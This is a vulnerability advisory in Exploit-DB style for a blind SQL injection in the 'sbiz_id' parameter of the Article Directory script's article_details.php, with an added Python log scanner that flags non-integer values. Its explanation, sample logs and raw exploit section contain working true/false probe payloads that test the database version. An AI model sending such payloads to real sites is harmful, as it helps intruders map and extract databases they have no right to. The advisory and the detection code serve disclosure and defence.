Vendor: Article Directory
By: BorN To K!LL - h4ck3r
CVSS: 8.8 (HIGH)
Vulnerability: Blind SQL Injection
CWE: 89
Product Name: Article Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Article Directory (sbiz_id) Blind SQL Injection Vuln

The vulnerability is in the Article Directory script: the 'sbiz_id' parameter of 'article_details.php' is used in a SQL query in a way that lets an attacker inject their own SQL conditions. Because the injection is blind, the attacker learns the answer only from whether the page responds as true or false. The advisory's example sets 'sbiz_id' to '13 and substring(version(),1,1)=4' to check whether the database version is 4 and, if it is not, sets it to '13 and substring(version(),1,1)=5' to check whether the version is 5.

Mitigation:

The best way to mitigate this vulnerability is to sanitize user input and use parameterized queries.
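A detection check to run alongside the fix, as an added example that is not part of the original advisory: it scans web access logs for requests to 'article_details.php' whose 'sbiz_id' is not a plain integer. The log lines are constructed samples in combined log format, and the assumption that a legitimate 'sbiz_id' is always a short run of digits comes from the advisory's example value (13), not from the vendor.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /article_details.php?sbiz_id=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [01/Jan/2020:10:00:05 +0000] "GET /article_details.php?sbiz_id=13%20and%20substring(version(),1,1)=4 HTTP/1.1" 200 812 "-" "curl/7.0"
192.0.2.77 - - [01/Jan/2020:10:00:06 +0000] "GET /article_details.php?sbiz_id=13+and+substring(version(),1,1)=5 HTTP/1.1" 200 5120 "-" "curl/7.0"
192.0.2.10 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?sbiz_id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client, request target, status and response size from one log line
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)'
)
# Assumption: a legitimate sbiz_id is a short unsigned integer.
VALID_ID = re.compile(r"\d{1,10}")


def is_valid_sbiz_id(value):
    """Allow-list check; the same rule belongs in the application itself."""
    return VALID_ID.fullmatch(value) is not None


def find_suspicious(log_text):
    """Return one record per non-integer sbiz_id sent to article_details.php."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target, status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/article_details.php"):
            continue
        # parse_qs URL-decodes values and keeps repeated parameters as a list
        for value in parse_qs(url.query, keep_blank_values=True).get("sbiz_id", []):
            if not is_valid_sbiz_id(value):
                hits.append({"client": client, "sbiz_id": value,
                             "status": int(status), "bytes": size})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

One client sending near-identical values that differ only in the compared digit, with differing response sizes, is the pattern the advisory's true/false example leaves in a log.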

Exploit-DB raw data:

===========================================================
[~] Title: Article Directory (sbiz_id) Blind SQL Injection Vuln
[~] Script: Article Directory
[~] Price: $65
[~] Link: http://www.softbizscripts.com/article-management-script.php
===========================================================
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
===========================================================
[~] 3xploit:
/article_details.php?sbiz_id=[Blind-Injection]

[~] Example:
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=4    // False ,,
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=5    // True ,,
===========================================================
[~] Greetings:
bool Greetings = True;
if (Greetings = True)
{
    cout<<"Dr.2"
          <<"Q8 H4x0r"
          <<"Dr.Faustus"
          <<"AsbMay's Group"
          <<"darkc0de team"
          <<"my wife.."
          <<"and all friends \n";
}
else
{
    cout<<"No greeting ..\n";
}
===========================================================